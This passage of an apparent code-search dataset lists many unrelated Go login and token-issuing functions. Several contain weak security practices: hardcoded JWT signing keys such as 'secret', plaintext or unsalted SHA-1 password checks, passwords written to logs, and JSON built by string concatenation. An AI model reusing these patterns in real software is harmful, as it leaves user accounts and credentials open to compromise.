&http.Cookie{\n\t\t\tName: \"token\",\n\t\t\tValue: tokenString,\n\t\t\tExpires: expirationTimeGuest,\n\t\t})\n\t}\n\n}", "func (adminrepo *AdminRepo) GetAdminByEmail(email string) (*entity.Admin , error){\n\tfilter := bson.D{{\"email\", email },}\n\tadmin := &entity.Admin{}\n\tera := adminrepo.DB.Collection(entity.ADMIN).FindOne(context.TODO(), filter).Decode(admin)\n\treturn admin, era\n}", "func LoginPage(w http.ResponseWriter, r *http.Request) { \n tmpl, err := template.ParseFiles(\"templates/loginPage.html\")\n if err != nil {\n fmt.Println(err)\n }\n var user helpers.User\n credentials := userCredentials{\n EmailId: r.FormValue(\"emailId\"),\n Password: r.FormValue(\"password\"), \n }\n\n login_info := dbquery.GetUserByEmail(credentials.EmailId)\n user = helpers.User{\n UserId: login_info.UserId,\n FirstName: login_info.FirstName,\n LastName: login_info.LastName, \n Role: login_info.Role,\n Email: login_info.Email,\n \n }\n\n var emailValidation string\n\n _userIsValid := CheckPasswordHash(credentials.Password, login_info.Password)\n\n if !validation(login_info.Email, credentials.EmailId, login_info.Password, credentials.Password) {\n emailValidation = \"Please enter valid Email ID/Password\"\n }\n\n if _userIsValid {\n setSession(user, w)\n http.Redirect(w, r, \"/dashboard\", http.StatusFound)\n }\n\n var welcomeLoginPage string\n welcomeLoginPage = \"Login Page\"\n\n tmpl.Execute(w, Response{WelcomeMessage: welcomeLoginPage, ValidateMessage: emailValidation}) \n \n}", "func Login(nbmaster string, httpClient *http.Client, username string, password string, domainName string, domainType string) string {\r\n fmt.Printf(\"\\nLog into the NetBackup webservices...\\n\")\r\n\r\n loginDetails := map[string]string{\"userName\": username, \"password\": password}\r\n if len(domainName) > 0 {\r\n loginDetails[\"domainName\"] = domainName\r\n }\r\n if len(domainType) > 0 {\r\n loginDetails[\"domainType\"] = domainType\r\n }\r\n loginRequest, _ := json.Marshal(loginDetails)\r\n\r\n uri := \"https://\" + nbmaster + \":\" + port + \"/netbackup/login\"\r\n\r\n request, _ := http.NewRequest(http.MethodPost, uri, bytes.NewBuffer(loginRequest))\r\n request.Header.Add(\"Content-Type\", contentTypeV2);\r\n\r\n response, err := httpClient.Do(request)\r\n\r\n token := \"\"\r\n if err != nil {\r\n fmt.Printf(\"The HTTP request failed with error: %s\\n\", err)\r\n panic(\"Unable to login to the NetBackup webservices.\")\r\n } else {\r\n if response.StatusCode == 201 {\r\n data, _ := ioutil.ReadAll(response.Body)\r\n var obj interface{}\r\n json.Unmarshal(data, &obj)\r\n loginResponse := obj.(map[string]interface{})\r\n token = loginResponse[\"token\"].(string)\r\n } else {\r\n printErrorResponse(response)\r\n }\r\n }\r\n\r\n return token\r\n}", "func Login(c echo.Context) error {\n\t// Read the json body\n\tb, err := ioutil.ReadAll(c.Request().Body)\n\tif err != nil {\n\t\treturn echo.NewHTTPError(http.StatusBadRequest, err.Error())\n\t}\n\n\t// Verify length\n\tif len(b) == 0 {\n\t\treturn c.JSON(http.StatusBadRequest, map[string]string{\n\t\t\t\"verbose_msg\": \"You have sent an empty json\"})\n\t}\n\n\t// Validate JSON\n\tl := gojsonschema.NewBytesLoader(b)\n\tresult, err := app.LoginSchema.Validate(l)\n\tif err != nil {\n\t\treturn c.JSON(http.StatusBadRequest, err.Error())\n\t}\n\tif !result.Valid() {\n\t\tmsg := \"\"\n\t\tfor _, desc := range result.Errors() {\n\t\t\tmsg += fmt.Sprintf(\"%s, \", desc.Description())\n\t\t}\n\t\tmsg = strings.TrimSuffix(msg, \", \")\n\t\treturn c.JSON(http.StatusBadRequest, map[string]string{\n\t\t\t\"verbose_msg\": msg})\n\t}\n\n\t// Bind it to our User instance.\n\tloginUser := user.User{}\n\terr = json.Unmarshal(b, &loginUser)\n\tif err != nil {\n\t\treturn c.JSON(http.StatusInternalServerError, err.Error())\n\t}\n\tloginUsername := loginUser.Username\n\tloginPassword := loginUser.Password\n\tu, err := user.GetByUsername(loginUsername)\n\tif err != nil {\n\t\treturn c.JSON(http.StatusNotFound, map[string]string{\n\t\t\t\"verbose_msg\": \"Username does not exist !\"})\n\t}\n\n\tif !comparePasswords(u.Password, []byte(loginPassword)) {\n\t\treturn c.JSON(http.StatusUnauthorized, map[string]string{\n\t\t\t\"verbose_msg\": \"Username or password does not match !\"})\n\t}\n\n\tif !u.Confirmed {\n\t\treturn c.JSON(http.StatusUnauthorized, map[string]string{\n\t\t\t\"verbose_msg\": \"Account not confirmed, please confirm your email !\"})\n\t}\n\n\ttoken, err := createJwtToken(u)\n\tif err != nil {\n\t\treturn c.JSON(http.StatusInternalServerError, map[string]string{\n\t\t\t\"verbose_msg\": \"Internal server error !\"})\n\t}\n\n\t// Create a cookie to place the jwt token\n\tcookie := createJwtCookie(token)\n\tc.SetCookie(cookie)\n\n\treturn c.JSON(http.StatusOK, map[string]string{\n\t\t\"verbose_msg\": \"You were logged in !\",\n\t\t\"token\": token,\n\t})\n}", "func LoginCustomer(email string) (models.Customer, error) {\n\tvar customer models.Customer\n\tvar err error\n\tif err = config.DB.Where(\"email = ?\", email).First(&customer).Error; err != nil {\n\t\treturn customer, err\n\t}\n\tcustomer.Token, err = middlewares.CreateToken(int(customer.ID))\n\tif err != nil {\n\t\treturn customer, err\n\t}\n\tif err := config.DB.Save(customer).Error; err != nil {\n\t\treturn customer, err\n\t}\n\n\treturn customer, nil\n}", "func Login(w http.ResponseWriter, r *http.Request) {\n\tbody, err := ioutil.ReadAll(r.Body)\n\tif err != nil {\n\t\tutils.Error(w, http.StatusUnprocessableEntity, err)\n\t\treturn\n\t}\n\tvar user models.User\n\tif err = json.Unmarshal(body, &user); err != nil {\n\t\tutils.Error(w, http.StatusBadRequest, err)\n\t\treturn\n\t}\n\tdb, error := database.Connect()\n\tif error != nil {\n\t\tutils.Error(w, http.StatusInternalServerError, error)\n\t\treturn\n\t}\n\tdefer db.Close()\n\tuserRepo := repository.NewUserRepo(db)\n\tuserFound, err := userRepo.FindByEmail(user.Email)\n\tif error != nil {\n\t\tutils.Error(w, http.StatusInternalServerError, error)\n\t\treturn\n\t}\n\tif err = hash.Verify(user.Password, userFound.Password); err != nil {\n\t\tutils.Error(w, http.StatusUnauthorized, err)\n\t\treturn\n\t}\n\ttoken, err := authentication.Token(userFound.ID)\n\tif err != nil {\n\t\tutils.Error(w, http.StatusInternalServerError, err)\n\t\treturn\n\t}\n\tw.Write([]byte(token))\n}", "func Login(nbmaster string, httpClient *http.Client, username string, password string, domainName string, domainType string) string {\n fmt.Printf(\"\\nLogin to the NetBackup webservices...\\n\")\n\n loginDetails := map[string]string{\"userName\": username, \"password\": password}\n if len(domainName) > 0 {\n loginDetails[\"domainName\"] = domainName\n }\n if len(domainType) > 0 {\n loginDetails[\"domainType\"] = domainType\n }\n loginRequest, _ := json.Marshal(loginDetails)\n\n uri := \"https://\" + nbmaster + \":\" + port + \"/netbackup/login\"\n\n request, _ := http.NewRequest(http.MethodPost, uri, bytes.NewBuffer(loginRequest))\n request.Header.Add(\"Content-Type\", contentType);\n\n response, err := httpClient.Do(request)\n\n token := \"\"\n if err != nil {\n fmt.Printf(\"The HTTP request failed with error: %s\\n\", err)\n panic(\"Unable to login to the NetBackup webservices\")\n } else {\n if response.StatusCode == 201 {\n data, _ := ioutil.ReadAll(response.Body)\n var obj interface{}\n json.Unmarshal(data, &obj)\n loginResponse := obj.(map[string]interface{})\n token = loginResponse[\"token\"].(string)\n } else {\n responseBody, _ := ioutil.ReadAll(response.Body)\n fmt.Printf(\"%s\\n\", responseBody)\n panic(\"Unable to login to the NetBackup webservices\")\n }\n }\n\n return token\n}", "func Login() echo.HandlerFunc {\n\treturn emailAndPasswordRequired(\n\t\tfunc(context echo.Context) error {\n\t\t\tpassword := context.FormValue(\"password\")\n\t\t\temail := context.FormValue(\"email\")\n\t\t\tuser, err := FindByEmail(email)\n\t\t\tif err != nil || user == nil {\n\t\t\t\tlog.Println(err)\n\t\t\t\treturn context.JSON(http.StatusUnauthorized, errors.New(\"Wrong email and password combination\"))\n\t\t\t}\n\t\t\terr = bcrypt.CompareHashAndPassword([]byte(user.Hash), []byte(password))\n\t\t\tif err != nil {\n\t\t\t\tlog.Println(err)\n\t\t\t\treturn context.JSON(http.StatusUnauthorized, errors.New(\"Wrong email and password combination\"))\n\t\t\t}\n\t\t\tauthToken, sessionID := auth.GetSessionToken()\n\t\t\tuser.Hash = \"\" // dont return the hash, for security concerns\n\n\t\t\tuserSession, err := session.New(sessionID, user.ID, user.Firstname, user.Lastname, user.Email, user.IsAdmin)\n\t\t\tif err != nil {\n\t\t\t\tcontext.JSON(http.StatusInternalServerError, err)\n\t\t\t}\n\t\t\terr = session.Save(&userSession)\n\t\t\tif err != nil {\n\t\t\t\tlog.Printf(\"Cannot save session %+v: %s\\n\", userSession, err)\n\t\t\t\tcontext.JSON(http.StatusInternalServerError, err)\n\t\t\t}\n\t\t\tcontext.Response().Header().Set(echo.HeaderAuthorization, authToken)\n\t\t\taddCookie(context, authToken)\n\t\t\treturn context.JSON(http.StatusOK, formatUser(user))\n\t\t})\n}", "func Login(context *gin.Context) {\n\t//提供邮箱和密码;\n\t//邮箱应当存在,否则报错\n\t//密码应当匹配。否则报错\n\t//返回token\n\n\t//从请求中获取数据。前端往后端请求的时候密码应该做一次哈希,因此这里直接用哈希后的密码。\n\temail := context.PostForm(\"Email\")\n\tpassword := context.PostForm(\"Password\")\n\n\t//合法性验证由前端完成,进行用户存在性验证\n\tuser := util.GetUserFormEmail(email)\n\tif user.ID == 0 {\n\t\t//log.Println(\"用户不存在\")\n\t\tresponse.ReturnJson(context, 422, nil, \"用户不存在\")\n\t\treturn\n\t}\n\n\t//密码匹配验证\n\tif !util.PasswordMatchQ(password, user.Hashword) {\n\t\t//log.Println(\"密码不匹配\")\n\t\tresponse.ReturnJson(context, 400, nil, \"用户名与密码不匹配\")\n\t\treturn\n\t}\n\n\t//默认正常行为:发放token\n\ttoken, err := common.GetToken(user)\n\t//出错处理\n\tif err != nil {\n\t\tresponse.ReturnJson(context, 500, nil, \"系统异常\")\n\t\tlog.Printf(\"token err:%v\", err)\n\t\treturn\n\t}\n\n\tresponse.Success(context, gin.H{\"token\": token}, \"登录成功\")\n}", "func login(auth authetication.Service) http.HandlerFunc {\n\treturn func(rw http.ResponseWriter, r *http.Request) {\n\t\temail := r.PostFormValue(\"email\")\n\t\tpassword := r.PostFormValue(\"password\")\n\t\ttoken, err := auth.Login(r.Context(), email, password)\n\n\t\trw.Header().Set(\"Content-Type\", \"application/json\")\n\n\t\tif err != nil {\n\t\t\tvar jsonErr error\n\t\t\tif errors.Is(err, authetication.ErrInvalidEmail) {\n\t\t\t\terrorRes := constructErrorWithField(http.StatusConflict,\n\t\t\t\t\t\"email\",\n\t\t\t\t\t\"invalid email address\",\n\t\t\t\t\t\"Enter a proper email address\")\n\t\t\t\trw.WriteHeader(http.StatusConflict)\n\t\t\t\tjsonErr = json.NewEncoder(rw).Encode(errorRes)\n\t\t\t\treturn\n\n\t\t\t} else if errors.Is(err, authetication.ErrPasswordLengthUnAcceptable) {\n\t\t\t\terrorRes := constructErrorWithField(http.StatusConflict,\n\t\t\t\t\t\"password\",\n\t\t\t\t\t\"password is unacceptable\",\n\t\t\t\t\t\"Password length is either too short or too long\")\n\t\t\t\trw.WriteHeader(http.StatusConflict)\n\t\t\t\tjsonErr = json.NewEncoder(rw).Encode(errorRes)\n\t\t\t\treturn\n\n\t\t\t} else if errors.Is(err, authetication.ErrIdentityDoesNotExists) {\n\t\t\t\terrorRes := constructError(http.StatusConflict,\n\t\t\t\t\t\"identity does not exists\",\n\t\t\t\t\t\"Email or password is not correct\",\n\t\t\t\t)\n\t\t\t\trw.WriteHeader(http.StatusConflict)\n\t\t\t\tjsonErr = json.NewEncoder(rw).Encode(errorRes)\n\t\t\t\treturn\n\n\t\t\t} else if errors.Is(err, authetication.ErrUnableToProcessRequest) {\n\t\t\t\terrorRes := constructError(http.StatusInternalServerError,\n\t\t\t\t\t\"unable to process request\",\n\t\t\t\t\t\"There was problem in processing your request\")\n\t\t\t\tjsonErr = json.NewEncoder(rw).Encode(errorRes)\n\t\t\t\trw.WriteHeader(http.StatusInternalServerError)\n\t\t\t\treturn\n\t\t\t}\n\t\t\tif jsonErr != nil {\n\t\t\t\tlog.Println(jsonErr)\n\t\t\t}\n\t\t\treturn\n\n\t\t}\n\t\tjson.NewEncoder(rw).Encode(token)\n\n\t}\n}", "func (h AuthByEmailHandler) serveLogin(w http.ResponseWriter, r *http.Request) (int, error) {\n\t// Parse the form data in the request body\n\tr.ParseForm()\n\n\tif len(r.PostForm[\"email\"]) == 0 {\n\t\treturn h.serveBadRequest(w)\n\t}\n\n\temail, err := NewEmailAddrFromString(r.PostForm[\"email\"][0])\n\tif err != nil {\n\t\treturn h.serveBadRequest(w)\n\t}\n\n\tuserID := CRYPTO.UserIDfromEmail(email)\n\n\t// If the user is new but from a whitelisted domain, they should be added before being sent a link\n\tif h.config.IsDomainWhitelisted(email.Domain) && !h.database.IsKnownUser(userID) {\n\t\t// If the user is not known, but should be automatically approved, we add them to the database\n\t\t// and then send the e-mail.\n\t\th.database.AddUser(userID)\n\t}\n\n\t// Send the appropriate email\n\tif h.database.IsKnownUser(userID) {\n\t\t// If the user is known, we support a kiosk login by giving this browser an invalid\n\t\t// cookie that can later be validated.\n\t\tcookie, err := h.database.NewCookieToken(CookieToken{UserID: userID, IsValidated: false, BrowserContext: GetBrowserContext(r)})\n\t\tif err != nil {\n\t\t\th.logger.Printf(\"Database error trying to set cookie for an existing user, %v\\n\", err)\n\t\t\treturn 500, err\n\t\t}\n\n\t\ttoken, err := h.database.NewLinkToken(LinkToken{UserID: userID, CorrespondingCookie: cookie}, time.Hour)\n\t\tif err != nil {\n\t\t\th.logger.Printf(\"Database error trying to log in an existing user, %v\\n\", err)\n\t\t\treturn 500, err\n\t\t}\n\n\t\terr = h.mailer.SendLoginLink(email, token)\n\t\tif err != nil {\n\t\t\th.logger.Printf(\"Error mailing user %v a login link, %v\", email.String(), err)\n\t\t\treturn 500, err\n\t\t}\n\n\t\t// Everything worked, give the cookie\n\t\thttp.SetCookie(w, &http.Cookie{\n\t\t\tName: \"authByEmailToken\",\n\t\t\tPath: \"/\",\n\t\t\tValue: cookie,\n\t\t\tMaxAge: int(h.config.CookieValidity.Seconds()), // seconds\n\t\t\tSecure: r.URL.Scheme == \"https\",\n\t\t\tHttpOnly: true,\n\t\t})\n\t} else {\n\t\t// For unknown users, make an admin request. Given the timescale, setting an unvalidated\n\t\t// cookie is not necessary (kiosk login is not supported).\n\t\terr := h.mailer.SendAdminLoginRequest(email)\n\t\tif err != nil {\n\t\t\th.logger.Printf(\"Error mailing user %v's admin an approval link, %v\", email.String(), err)\n\t\t\treturn 500, err\n\t\t}\n\n\t\t// We still make and give a cookie, though it is not tracked. This is necessary to prevent\n\t\t// users from using this interface to test if a certain e-mail address is known to us.\n\t\thttp.SetCookie(w, &http.Cookie{\n\t\t\tName: \"authByEmailToken\",\n\t\t\tPath: \"/\",\n\t\t\tValue: newRandom(),\n\t\t\tMaxAge: int(h.config.CookieValidity.Seconds()), // seconds\n\t\t\tSecure: r.URL.Scheme == \"https\",\n\t\t\tHttpOnly: true,\n\t\t})\n\t}\n\n\treturn h.serveRedirect(w, \"/auth/wait\")\n}", "func Login(c echo.Context, dbGorm *gorm.DB) error {\n\tr := new(LoginAccount)\n\n\tif err := c.Bind(r); err != nil {\n\t\treturn c.JSON(http.StatusBadRequest, &ErrorResponse{\n\t\t\tStatusCode: http.StatusBadRequest,\n\t\t\tMessage: \"Tên đăng nhập hoặc mật khẩu không đúng. Vui lòng kiểm tra lại\",\n\t\t})\n\t}\n\n\tvar (\n\t\tuser db.Account\n\t\tstaff db.Staff\n\t)\n\n\tdbGorm.Where(&db.Account{Username: r.Username, Password: r.Password}).First(&user)\n\tif user.ID == 0 {\n\t\treturn c.JSON(http.StatusBadRequest, &ErrorResponse{\n\t\t\tStatusCode: http.StatusBadRequest,\n\t\t\tMessage: \"Tên đăng nhập hoặc mật khẩu không đúng. Vui lòng kiểm tra lại\",\n\t\t})\n\t}\n\n\tdbGorm.Where(\"id = ?\", user.StaffID).First(&staff)\n\n\t// Create token\n\ttoken := jwt.New(jwt.SigningMethodHS256)\n\n\t// // set claims\n\tclaims := token.Claims.(jwt.MapClaims)\n\tclaims[\"username\"] = user.Username\n\tclaims[\"name\"] = staff.FullName\n\tclaims[\"isnew\"] = staff.IsNew\n\tclaims[\"roleid\"] = staff.RoleID\n\tclaims[\"staffid\"] = staff.ID\n\n\t// // Generate encoded token and send it as response.\n\tt, err := token.SignedString([]byte(\"secret\"))\n\tif err != nil {\n\t\treturn err\n\t}\n\n\t// wait for staff table for create token\n\n\treturn c.JSON(http.StatusOK, map[string]string{\n\t\t\"token\": t,\n\t})\n}", "func (api *API) Login(ctx *gin.Context) {\n\t// Unmarshall the 'login' request body.\n\tvar login Login\n\terr := ctx.BindJSON(&login)\n\tif err != nil {\n\t\tctx.JSON(http.StatusBadRequest, gin.H{\"errorMessage\": fmt.Sprintf(\"%s\", err)})\n\t\treturn\n\t} \n\t\n\t// Get user and credentials.\n\tuser, err := api.db.GetUser(ctx, login.Email)\n\tif err != nil {\n\t\tctx.AbortWithStatus(http.StatusUnauthorized)\n\t\treturn\n\t}\n\tcred, err := api.db.GetCredential(ctx, user.ID)\n\tif err != nil {\n\t\tctx.AbortWithStatus(http.StatusUnauthorized)\n\t\treturn\n\t}\n\n\t// Generate Hashed password\n\terr = bcrypt.CompareHashAndPassword([]byte(cred.Password), []byte(login.Password))\n\tif err != nil {\n\t\tctx.AbortWithStatus(http.StatusUnauthorized)\n\t\treturn\n\t}\n\n\t// Create the JWT claims. Includes the username and expiry time.\n\texpirationTime := time.Now().Add(5 * time.Minute)\n\tclaims := &jwtClaims{\n\t\tUserID: user.ID,\n\t\tStandardClaims: jwt.StandardClaims{\n\t\t\tExpiresAt: expirationTime.Unix(),\n\t\t},\n\t}\n\n\t// Declare the token with the HMAC algorithm used for signing, and the claims\n\ttoken := jwt.NewWithClaims(jwt.SigningMethodHS256, claims)\n\ttokenString, err := token.SignedString(jwtKey)\n\tif err != nil {\n\t\tctx.JSON(http.StatusInternalServerError, gin.H{\"errorMessage\": fmt.Sprintf(\"%s\", err)})\n\t\treturn\n\t}\n\n\t// Set the JWT token as a cookie.\n\texpiration := int(5 * 60)\n\tpath := \"\"\n\tdomain := \"\"\n\tsecure := true\n\thttpOnly := true\n\tctx.SetCookie(\"token\", tokenString, expiration, path, domain, secure, httpOnly)\n\n\tctx.Status(http.StatusOK)\n}", "func FetchAdmin(email, password string) (*model.Admin, error) {\n\n\tvar admin model.Admin\n\terr := db.From(\"admin\").One(\"Email\", email, &admin)\n\tif err != nil {\n\t\tlog.Println(\"xxx\")\n\t\treturn nil, err\n\t}\n\n\t_password, err := crypto.AESEncrypt(password)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tif admin.Password != _password {\n\t\treturn nil, fmt.Errorf(\"Password not match\")\n\t}\n\n\treturn &admin, nil\n}", "func (s *Service) Login(c context.Context, app *model.App, subid int32, userid, rsaPwd string) (res *model.LoginToken, err error) {\n\tif userid == \"\" || rsaPwd == \"\" {\n\t\terr = ecode.UsernameOrPasswordErr\n\t\treturn\n\t}\n\tcache := true\n\ta, pwd, tsHash, err := s.checkUserData(c, userid, rsaPwd)\n\tif err != nil {\n\t\tif err == ecode.PasswordHashExpires || err == ecode.PasswordTooLeak {\n\t\t\treturn\n\t\t}\n\t\terr = nil\n\t} else {\n\t\tvar t *model.Perm\n\t\tif t, cache, err = s.saveToken(c, app.AppID, subid, a.Mid); err != nil {\n\t\t\terr = nil\n\t\t} else {\n\t\t\tres = &model.LoginToken{\n\t\t\t\tMid: t.Mid,\n\t\t\t\tAccessKey: t.AccessToken,\n\t\t\t\tExpires: t.Expires,\n\t\t\t}\n\t\t\treturn\n\t\t}\n\t}\n\tif res, err = s.loginOrigin(c, userid, pwd, tsHash); err != nil {\n\t\treturn\n\t}\n\tif cache && res != nil {\n\t\ts.d.SetTokenCache(c, &model.Perm{\n\t\t\tMid: res.Mid,\n\t\t\tAppID: app.AppID,\n\t\t\tAppSubID: subid,\n\t\t\tAccessToken: res.AccessKey,\n\t\t\tCreateAt: res.Expires - _expireSeconds,\n\t\t\tExpires: res.Expires,\n\t\t})\n\t}\n\treturn\n}", "func (c *Client) EmailLogin(ctx context.Context, email models.Email, password models.Password) (*models.Session, error) {\n\treturn c.transport.EmailLogin(ctx, email, password)\n}", "func LoginVerification(c *gin.Context) {\n\ttokenStr := c.Request.Header.Get(\"Authorization\")\n\tusername, valid, err := model.ParseToken(tokenStr[7:])\n\tif !valid || err != nil {\n\t\tc.JSON(http.StatusUnauthorized, gin.H{\n\t\t\t\"success\": false,\n\t\t\t\"error\": \"Unauthorized\",\n\t\t\t\"data\": \"\",\n\t\t})\n\t\tc.Abort()\n\t\treturn\n\t}\n\tc.Set(\"username\", username)\n\tc.Next()\n}", "func (m Users) Login(user User) (string, error) {\n\tvar hash string\n\tsqlStatement := `SELECT password, id, created_at FROM users WHERE email=$1`\n\terr := m.DB.QueryRow(sqlStatement, user.Email).Scan(&hash, &user.ID, &user.CreatedAt)\n\n\tif err == sql.ErrNoRows {\n\t\treturn \"\", ErrUserNotFound\n\t}\n\n\tif err = checkPasswordHash(user.Password, hash); err != nil {\n\t\treturn \"\", ErrIncorrectPass\n\t}\n\texpiresAt := time.Now().Add(time.Minute * 100000).Unix()\n\n\ttk := &Token{\n\t\tUserID: user.ID,\n\t\tEmail: user.Email,\n\t\tCreatedAt: user.CreatedAt,\n\t\tStandardClaims: &jwt.StandardClaims{\n\t\t\tExpiresAt: expiresAt,\n\t\t},\n\t}\n\n\ttoken := jwt.NewWithClaims(jwt.GetSigningMethod(\"HS256\"), tk)\n\n\ttokenString, err := token.SignedString([]byte(\"secret\"))\n\n\treturn tokenString, err\n}", "func GetLoginFunc(db *sqlx.DB) http.HandlerFunc {\n\treturn func(w http.ResponseWriter, r *http.Request) {\n\t\tusername := \"\"\n\t\tpassword := \"\"\n\t\tbody, err := ioutil.ReadAll(r.Body)\n\t\tif err != nil {\n\t\t\tlog.Println(\"Error reading body: \", err.Error())\n\t\t\thttp.Error(w, \"Error reading body: \"+err.Error(), http.StatusBadRequest)\n\t\t\treturn\n\t\t}\n\t\tvar lj loginJson\n\t\tlog.Println(body)\n\t\terr = json.Unmarshal(body, &lj)\n\t\tif err != nil {\n\t\t\tlog.Println(\"Error unmarshalling JSON: \", err.Error())\n\t\t\thttp.Error(w, \"Invalid JSON: \"+err.Error(), http.StatusBadRequest)\n\t\t\treturn\n\t\t}\n\t\tusername = lj.U\n\t\tpassword = lj.P\n\t\tuserInterface, err := api.GetUser(username, db)\n\t\tif err != nil {\n\t\t\thttp.Error(w, \"Invalid user: \"+err.Error(), http.StatusUnauthorized)\n\t\t\treturn\n\t\t}\n\t\tu, ok := userInterface.(api.Users)\n\t\tif !ok {\n\t\t\thttp.Error(w, \"Error GetUser returned a non-user.\", http.StatusInternalServerError)\n\t\t\treturn\n\t\t}\n\n\t\tencBytes := sha1.Sum([]byte(password))\n\t\tencString := hex.EncodeToString(encBytes[:])\n\t\tif err != nil {\n\t\t\tctx.Set(r, \"user\", nil)\n\t\t\tlog.Println(\"Invalid password\")\n\t\t\thttp.Error(w, \"Invalid password: \"+err.Error(), http.StatusUnauthorized)\n\t\t\treturn\n\t\t}\n\t\tif u.LocalPassword.String != encString {\n\t\t\tctx.Set(r, \"user\", nil)\n\t\t\tlog.Println(\"Invalid password\")\n\t\t\thttp.Error(w, \"Invalid password\", http.StatusUnauthorized)\n\t\t\treturn\n\t\t}\n\n\t\t// Create the token\n\t\ttoken := jwt.New(jwt.SigningMethodHS256)\n\t\t// Set some claims\n\t\ttoken.Claims[\"userid\"] = u.Username\n\t\ttoken.Claims[\"role\"] = u.Links.RolesLink.ID\n\t\ttoken.Claims[\"exp\"] = time.Now().Add(time.Hour * 72).Unix()\n\t\t// Sign and get the complete encoded token as a string\n\t\ttokenString, err := token.SignedString([]byte(\"mySigningKey\")) // TODO JvD\n\t\tif err != nil {\n\t\t\thttp.Error(w, err.Error(), http.StatusInternalServerError)\n\t\t\treturn\n\t\t}\n\t\tjs, err := json.Marshal(TokenResponse{Token: tokenString})\n\t\tif err != nil {\n\t\t\thttp.Error(w, err.Error(), http.StatusInternalServerError)\n\t\t\treturn\n\t\t}\n\t\tw.Header().Set(\"Content-Type\", \"application/json\")\n\t\tw.Write(js)\n\t}\n}", "func login(c *gin.Context) {\n\tvar loginDetails LoginDetails\n\tvar err error\n\n\t// Get query params into object\n\tif err = c.ShouldBind(&loginDetails); err != nil {\n\t\tprintln(err.Error())\n\t\tc.Status(http.StatusBadRequest)\n\t\treturn\n\t}\n\n\tvar passwordHash string\n\tvar id int\n\tsqlStatement := `SELECT id, password_hash FROM player WHERE email=LOWER($1) LIMIT 1;`\n\terr = db.QueryRow(sqlStatement, loginDetails.Email).Scan(&id, &passwordHash)\n\tif handleError(err, c) {\n\t\treturn\n\t}\n\n\tif bcrypt.CompareHashAndPassword([]byte(passwordHash), []byte(loginDetails.Password)) != nil {\n\t\tprintln(\"Incorrect password\")\n\n\t\tc.AbortWithStatus(http.StatusNotFound)\n\t\treturn\n\t}\n\n\ttoken, err := CreateTokenInDB(id)\n\tif err != nil {\n\t\tprintln(err.Error())\n\t\tc.AbortWithStatus(http.StatusInternalServerError)\n\t\treturn\n\t}\n\n\t// Return token and user id\n\tretObj := PlayerToken{PlayerId: id, Token: token}\n\n\tc.JSON(http.StatusOK, retObj)\n}", "func SendLoginGetAccessToken(url string, email string, password string, clientId string) string {\n\tvar postStr = []byte(`{\"username\": \"` + email + `\",\"password\": \"` + password + `\", \"client_id\": \"` + clientId + `\", \"grant_type\": \"password\"}`)\n\n\t// Create client\n\tclient := &http.Client{}\n\n\t// Create request\n\treq, err := http.NewRequest(\"POST\", url+\"/oauth/token\", bytes.NewBuffer(postStr))\n\n\t// Headers\n\treq.Header.Set(\"Accept\", \"application/json\")\n\treq.Header.Set(\"Content-Type\", `application/json; charset=utf-8`)\n\n\t// Fetch Request\n\tresp, err := client.Do(req)\n\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tdefer resp.Body.Close()\n\n\t// Read Response Body\n\trespBody, _ := ioutil.ReadAll(resp.Body)\n\n\tif resp.StatusCode != 200 {\n\t\tfmt.Println(\"response Status : \", resp.Status)\n\t\tfmt.Println(\"response Headers : \", resp.Header)\n\t\tfmt.Println(\"response Body : \", string(respBody))\n\t\treturn \"\"\n\t}\n\n\t// Return the access token\n\treturn gjson.Get(string(respBody), \"access_token\").String()\n}", "func Login(w *fiber.Ctx) {\n\tlogin := new(login)\n\tif err := w.BodyParser(login); err != nil {\n\t\tw.Status(500).JSON(\"Missing fields\")\n\t\treturn\n\t}\n\n\tvar user u.User\n\tdb.DBConn.Where(\"email = ?\", login.Email).Find(&user)\n\tif user.Phone == \"\" {\n\t\tw.Status(500).JSON(\"No user with this email\")\n\t\treturn\n\t}\n\n\thashPass := []byte(user.Password)\n\tbodyPass := []byte(login.Password)\n\terrorHash := bcrypt.CompareHashAndPassword(hashPass, bodyPass)\n\tif errorHash != nil {\n\t\tw.Status(500).JSON(\"Wrong password\")\n\t\treturn\n\t}\n\n\texpTime := time.Now().Add(4000 * time.Minute)\n\tclaimsJwt := &claims{\n\t\temail: login.Email,\n\t\tStandardClaims: jwt.StandardClaims{\n\t\t\tExpiresAt: expTime.Unix(),\n\t\t},\n\t}\n\ttokenMethod := jwt.NewWithClaims(jwt.SigningMethodHS256, claimsJwt)\n\tjwtKey := []byte(q.GetDotEnv(\"JWT_KEY\"))\n\ttoken, err := tokenMethod.SignedString(jwtKey)\n\tif err != nil {\n\t\tw.Status(500).JSON(\"Error in jwt token\")\n\t\treturn\n\t}\n\n\tw.Status(200).JSON(&fiber.Map{\n\t\t\"user\": user,\n\t\t\"token\": token,\n\t})\n}", "func (s *ServiceImpl) Login(ctx echo.Context, req LoginRequest) (string, error) {\n\tconform.Strings(&req)\n\n\tuser, err := s.repo.GetUserByEmail(req.Email)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\t// Must be admin or owner, and must be verified.\n\tif _, existing := model.Roles[user.Role]; !existing {\n\t\treturn \"\", errors.New(\"unauthorized role\")\n\t}\n\n\t// Compare the password with the hashed password.\n\tmatch, err := s.hasher.Compare(req.Password, user.HashedPassword)\n\tif err != nil || !match {\n\t\treturn \"\", ErrInvalidEmailOrPassword\n\t}\n\n\taccessToken, err := s.signer.SignWithRole(strconv.Itoa(user.ID), user.Role.Int())\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\treturn accessToken, nil\n}", "func (c *UserController) Login(ctx *app.LoginUserContext) error {\n\t// UserController_Login: start_implement\n\tpayload := ctx.Payload\n\tu, err := repositories.GetUserByEmail(c.DB, payload.Email)\n\tif err != nil {\n\t\tif err == sql.ErrNoRows {\n\t\t\treturn ctx.BadRequest(goa.ErrBadRequest(\"Invalid email or password\"))\n\t\t}\n\t\tc.Service.LogError(\"Login User\", \"err\", err)\n\t\treturn ctx.InternalServerError()\n\t}\n\thashedPassword := crypto.HashPassword(payload.Password, *u.Salt)\n\tif *u.Password != hashedPassword {\n\t\treturn ctx.BadRequest(goa.ErrBadRequest(\"Invalid email or password\"))\n\t}\n\ttoken, err := jwt.CreateJWTToken(*u.Email)\n\tif err != nil {\n\t\tc.Service.LogError(\"Login User\", \"err\", err)\n\t\treturn ctx.InternalServerError()\n\t}\n\n\tres := &app.Token{Token: &token}\n\treturn ctx.OK(res)\n\t// UserController_Login: 